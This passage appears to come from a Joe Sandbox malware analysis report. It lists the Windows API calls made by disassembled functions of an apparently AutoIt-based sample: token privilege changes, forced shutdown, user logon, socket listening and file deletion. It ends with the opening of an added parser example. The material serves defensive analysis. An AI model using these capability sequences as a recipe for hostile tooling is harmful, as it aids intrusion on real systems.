                            • FindFirstFileW.KERNEL32(?,?), ref: 00DA3B89
                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DA3BD9
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA3BEA
                            • FindClose.KERNEL32(00000000), ref: 00DA3C01
                            • FindClose.KERNEL32(00000000), ref: 00DA3C0A
                            Strings
                            Similarity
                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                            • String ID: \*.*
                            • API String ID: 2649000838-1173974218
                            • Opcode ID: 7aa9c7ac1d9ffc7d78b9a7e42cd43e68b02e73152a785b5fd6f7a3213fddf052
                            • Instruction ID: a421b2b00658bd0dad685c98d7dc3e1b147b3d232c3d52b9d59717ae2378ee16
                            • Opcode Fuzzy Hash: 7aa9c7ac1d9ffc7d78b9a7e42cd43e68b02e73152a785b5fd6f7a3213fddf052
                            • Instruction Fuzzy Hash: F6316D31008385ABC201EF24D891DAFB7A9FE92314F444E2DF4D592192EB21DA09CB77
                            APIs
                              • Part of subcall function 00D987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9882B
                              • Part of subcall function 00D987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98858
                              • Part of subcall function 00D987E1: GetLastError.KERNEL32 ref: 00D98865
                            • ExitWindowsEx.USER32(?,00000000), ref: 00DA51F9
                            Strings
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            • Opcode ID: 41f5832f91aca705fe3567d80e2125ef536135fe0fd189a91dabb0da8c6da931
                            • Instruction ID: ec246c7f5e2d6d0c400c45055c34fd7a34fa4e5ccef8c2254fe0f2614e0b7f62
                            • Opcode Fuzzy Hash: 41f5832f91aca705fe3567d80e2125ef536135fe0fd189a91dabb0da8c6da931
                            • Instruction Fuzzy Hash: C6017631B917022BFB282368BC8AFBB7298EB07750F680930F953E60D6DA505C0085B8
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DB62DC
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB62EB
                            • bind.WSOCK32(00000000,?,00000010), ref: 00DB6307
                            • listen.WSOCK32(00000000,00000005), ref: 00DB6316
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB6330
                            • closesocket.WSOCK32(00000000,00000000), ref: 00DB6344
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            • Opcode ID: 699cd6c0aa64eafb0882ac5f590b32ea788eb2f5382f63dda5a8afcd34b30736
                            • Instruction ID: 42498da9cc380fe3d1595ba16e4dbcb79f20428fa4650fd8356828b81e0a7387
                            • Opcode Fuzzy Hash: 699cd6c0aa64eafb0882ac5f590b32ea788eb2f5382f63dda5a8afcd34b30736
                            • Instruction Fuzzy Hash: 44218D71600205AFCB10AF68C885EAEB7E9EF48720F184159F856E7391C774ED01CB71
                            Strings
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: pb
                            APIs
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                            • _memmove.LIBCMT ref: 00D90258
                            • _memmove.LIBCMT ref: 00D9036D
                            • _memmove.LIBCMT ref: 00D90414
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID:
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D419FA
                            • GetSysColor.USER32(0000000F,?,?), ref: 00D41A4E
                            • SetBkColor.GDI32(?,00000000), ref: 00D41A61
                              • Part of subcall function 00D41290: DefDlgProcW.USER32(?,00000020,?), ref: 00D412D8
                            Similarity
                            • API ID: ColorProc$LongWindow
                            • String ID:
                            APIs
                              • Part of subcall function 00DB7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB7DB6
                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DB679E
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB67C7
                            • bind.WSOCK32(00000000,?,00000010), ref: 00DB6800
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB680D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00DB6821
                            Similarity
                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                            • String ID:
                            APIs
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D980C0
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D980CA
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D980D9
                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D980E0
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D980F6
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00DAC432
                            • CoCreateInstance.OLE32(00DD2D6C,00000000,00000001,00DD2BDC,?), ref: 00DAC44A
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • CoUninitialize.OLE32 ref: 00DAC6B7
                            Strings
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_memmove
                            • String ID: .lnk
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D44B45
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00D44AD0), ref: 00D44B57
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            Similarity
                            • API ID: __itow__swprintf
                            • String ID:
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00DBEE3D
                            • Process32FirstW.KERNEL32(00000000,?), ref: 00DBEE4B
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • Process32NextW.KERNEL32(00000000,?), ref: 00DBEF0B
                            • CloseHandle.KERNEL32(00000000), ref: 00DBEF1A
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                            • String ID:
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D9E628
                            Strings
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($|
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAB40B
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DAB465
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DAB4B2
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            APIs
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9882B
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98858
                            • GetLastError.KERNEL32 ref: 00D98865
                            Similarity
                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                            • String ID:
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D98774
                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D9878B
                            • FreeSid.ADVAPI32(?), ref: 00D9879B
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            APIs
                            • __time64.LIBCMT ref: 00DA889B
                              • Part of subcall function 00D6520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DA8F6E,00000000,?,?,?,?,00DA911F,00000000,?), ref: 00D65213
                              • Part of subcall function 00D6520A: __aulldiv.LIBCMT ref: 00D65233
                            Strings
                            Similarity
                            • API ID: Time$FileSystem__aulldiv__time64
                            • String ID: 0e
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DAC6FB
                            • FindClose.KERNEL32(00000000), ref: 00DAC72B
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DB9468,?,00DCFB84,?), ref: 00DAA097
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DB9468,?,00DCFB84,?), ref: 00DAA0A9
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: f8fcc1bc8ec2239d6b37d23b4e0d08ccd27a2de527fb30e6e65147cd299d1676
                            • Instruction ID: 3526aa566865231aff0e559bd31cb87ad349ed95fe0bc943926195069a809e30
                            • Opcode Fuzzy Hash: f8fcc1bc8ec2239d6b37d23b4e0d08ccd27a2de527fb30e6e65147cd299d1676
                            • Instruction Fuzzy Hash: 6CF0823550522EBBDB619FA8CC48FEA776DFF09361F008665F919D6281D7309940CBB1
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98309), ref: 00D981E0
                            • CloseHandle.KERNEL32(?), ref: 00D981F2
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            • API String ID: 81990902-0
                            • Opcode ID: b3197a10bc569d80fe08753f1405a4302b5ed7f735ae42e7d1e71404dc704011
                            • Instruction ID: cca949b53e8f7426ad3214c12bf3217376c63c01e1335753772bb4a4bbb6762b
                            • Opcode Fuzzy Hash: b3197a10bc569d80fe08753f1405a4302b5ed7f735ae42e7d1e71404dc704011
                            • Instruction Fuzzy Hash: 69E0E672010711AFE7256B60EC05D777BEAEF043107148C2DF455C4471DB62AC91DB30
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00D6A15A
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6A163
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 4bb422965853acae258acf8d19e21d7b4d648b9758e96b57a85b76e15d88fb47
                            • Instruction ID: 6bd045144d36314646c62453ce30d13cefd4f6d721ccb4f4a9f49b231469b4f3
                            • Opcode Fuzzy Hash: 4bb422965853acae258acf8d19e21d7b4d648b9758e96b57a85b76e15d88fb47
                            • Instruction Fuzzy Hash: C6B0923105434BBBCA002B91EC09FC83F6AEB84AA2F404020FA0DC4260CB6256528AA1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3dac0c0d4b03b25160ccdf2a07c6b3ae46bc27b9a316d2e10892a40dfc48904
                            • Instruction ID: bc6cb260328b5c487220f322cf73bd83a305dc281bea8e877bfc00eb13352224
                            • Opcode Fuzzy Hash: f3dac0c0d4b03b25160ccdf2a07c6b3ae46bc27b9a316d2e10892a40dfc48904
                            • Instruction Fuzzy Hash: A0320622D6AF414ED7239638D872339A389AFB73C4F55D737F819B5AA5EB28C4834110
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b9b57c9666998094d28bc7ada2979c2828d87a50b613e8cb564f4935b02965d
                            • Instruction ID: 46950106a68e3bbb2982c29390524f235b40dd36f9709ccbbf9b731604ec66b8
                            • Opcode Fuzzy Hash: 3b9b57c9666998094d28bc7ada2979c2828d87a50b613e8cb564f4935b02965d
                            • Instruction Fuzzy Hash: B0B1E220D2AF414DD72396398831336B75CAFBB2D5F52D71BFC6AB4E22EB2185834151
                            APIs
                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00DA4C76
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: mouse_event
                            • String ID:
                            • API String ID: 2434400541-0
                            • Opcode ID: 8778ec7e5e48d524938d2371247421bfecd2ef5a9134f16342239f4a2f94af45
                            • Instruction ID: d99a24755a165e45bdb14d780e219d075b8aa976dd712756d9ee1fd9b400370d
                            • Opcode Fuzzy Hash: 8778ec7e5e48d524938d2371247421bfecd2ef5a9134f16342239f4a2f94af45
                            • Instruction Fuzzy Hash: 54D05EA012220978EC6807208D4BFBAA109E3C27B1F98A14A7289C51C0E8E09801A034
                            APIs
                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D98389), ref: 00D987D1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            • Opcode ID: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
                            • Instruction ID: f49b1ec90247dbb959a382912a5dbba3ad30151e10d5a86c494e68a38186654b
                            • Opcode Fuzzy Hash: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
                            • Instruction Fuzzy Hash: E1D09E3226460EABEF019FA4DD05EEE3B6AEB04B01F408511FE15D51A1C775D935AB60
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00D6A12A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: ce3273ea63ce8096ea190a9956d12437ab05fe822a4658ec9a80be928e50918d
                            • Instruction ID: 5fab3f07f529ed7e50d760a3439acec3ef97946ff1932ad995580ec7094276d2
                            • Opcode Fuzzy Hash: ce3273ea63ce8096ea190a9956d12437ab05fe822a4658ec9a80be928e50918d
                            • Instruction Fuzzy Hash: E4A0123000020EB78A001B41EC048847F5DD6401907004020F40C80121873255114590
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52847b89eba096502155f3bf45d41e44164a1778acfbf80633943fb99d890c9c
                            • Instruction ID: 56394ad275ed4b6d074c7d4ade7c3735c23db2d102574d7c18e697e394bee0d3
                            • Opcode Fuzzy Hash: 52847b89eba096502155f3bf45d41e44164a1778acfbf80633943fb99d890c9c
                            • Instruction Fuzzy Hash: 5B224530604606CBDF2A8B24D49477C77A1FB01346F2C807ADD96AB59ADB30DD89EB71
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction ID: b7ce6156de22779d9996842d0a9694713f5307f360e994ccaa548b9a059b0f12
                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction Fuzzy Hash: 8FC181362095930BDF6D463A847403EFAA15EA27B131E076DD8F3CB1D4EE24D965EA30
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction ID: 9f177d32296d99122c62ae0df140f6fd8f2d83b0869396fd4615aa3ed02a579c
                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction Fuzzy Hash: CDC171362055930BDF6D463AC83453EBBA15EA27B131E076DD4F2DB1D5EE20C925EA30
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction ID: 36cab6f04b09db16ac0cea461bfd09b6429a1042bb8460f19705729b7d8718d5
                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction Fuzzy Hash: 13C16E3A2091930BDF6D463AC47413EFAA15EA27B231E176DD4B3CB1D4EE20C965DA70
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction ID: 033c2eac7ef82f7c9c8e3f20c8299b7eccc27741c91c1f5114df7a397519b45f
                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction Fuzzy Hash: 9C41D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 00DB785B
                            • DeleteObject.GDI32(00000000), ref: 00DB786D
                            • DestroyWindow.USER32 ref: 00DB787B
                            • GetDesktopWindow.USER32 ref: 00DB7895
                            • GetWindowRect.USER32(00000000), ref: 00DB789C
                            • SetRect.USER32 ref: 00DB79DD
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DB79ED
                            • CreateWindowExW.USER32 ref: 00DB7A35
                            • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7A41
                            • CreateWindowExW.USER32 ref: 00DB7A7B
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00DB7A9D
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7AB0
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7ABB
                            • GlobalLock.KERNEL32(00000000), ref: 00DB7AC4
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00DB7AD3
                            • GlobalUnlock.KERNEL32(00000000), ref: 00DB7ADC
                            • CloseHandle.KERNEL32(00000000), ref: 00DB7AE3
                            • GlobalFree.KERNEL32(00000000), ref: 00DB7AEE
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00DB7B00
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DD2CAC,00000000), ref: 00DB7B16
                            • GlobalFree.KERNEL32(00000000), ref: 00DB7B26
                            • CopyImage.USER32 ref: 00DB7B4C
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DB7B6B
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00DB7B8D
                            • ShowWindow.USER32(00000004), ref: 00DB7D7A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 2211948467-2373415609
                            • Opcode ID: ea3ab31e4052e393d1050288cf4863c789f10b102cab4f81ba50b88624f16214
                            • Instruction ID: 59aadca759f24d2a01e6381c1e063443172a7daa11373ba5620381f54bec9af6
                            • Opcode Fuzzy Hash: ea3ab31e4052e393d1050288cf4863c789f10b102cab4f81ba50b88624f16214
                            • Instruction Fuzzy Hash: 9D022871900216EFDB14DFA9DC89EAEBBB9EB48310F148158F916EB2A1C7319D41CB70
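The records above are Joe Sandbox's per-function export: an "APIs" list of call sites (with "ref:" virtual addresses inside the dumped module, and nested "Part of subcall function" entries), a "Memory Dump Source" whose "Offset:" is the module base when "based on PE: true", and "Similarity" fields such as API ID, String ID and Opcode ID. The parser below is an added example, not Joe Sandbox's or the sample's own code: it turns records in this layout into structured call lists, rebases each "ref:" address to an RVA against the dump's "Offset:" so a call site can be located in the extracted PE, and then lists which functions touch token or logon APIs. The sample text is a constructed subset of records taken from this listing (same IDs and addresses, fewer API lines per record), and the TOKEN_LOGON_APIS set is an illustrative assumption rather than anything the report defines.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: four records in the layout of the function listing above,
# using the page's own IDs and addresses but only a few API lines per record.
SAMPLE = """\
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98309), ref: 00D981E0
• CloseHandle.KERNEL32(?), ref: 00D981F2
Memory Dump Source
• Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• Opcode ID: b3197a10bc569d80fe08753f1405a4302b5ed7f735ae42e7d1e71404dc704011
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D98389), ref: 00D987D1
Memory Dump Source
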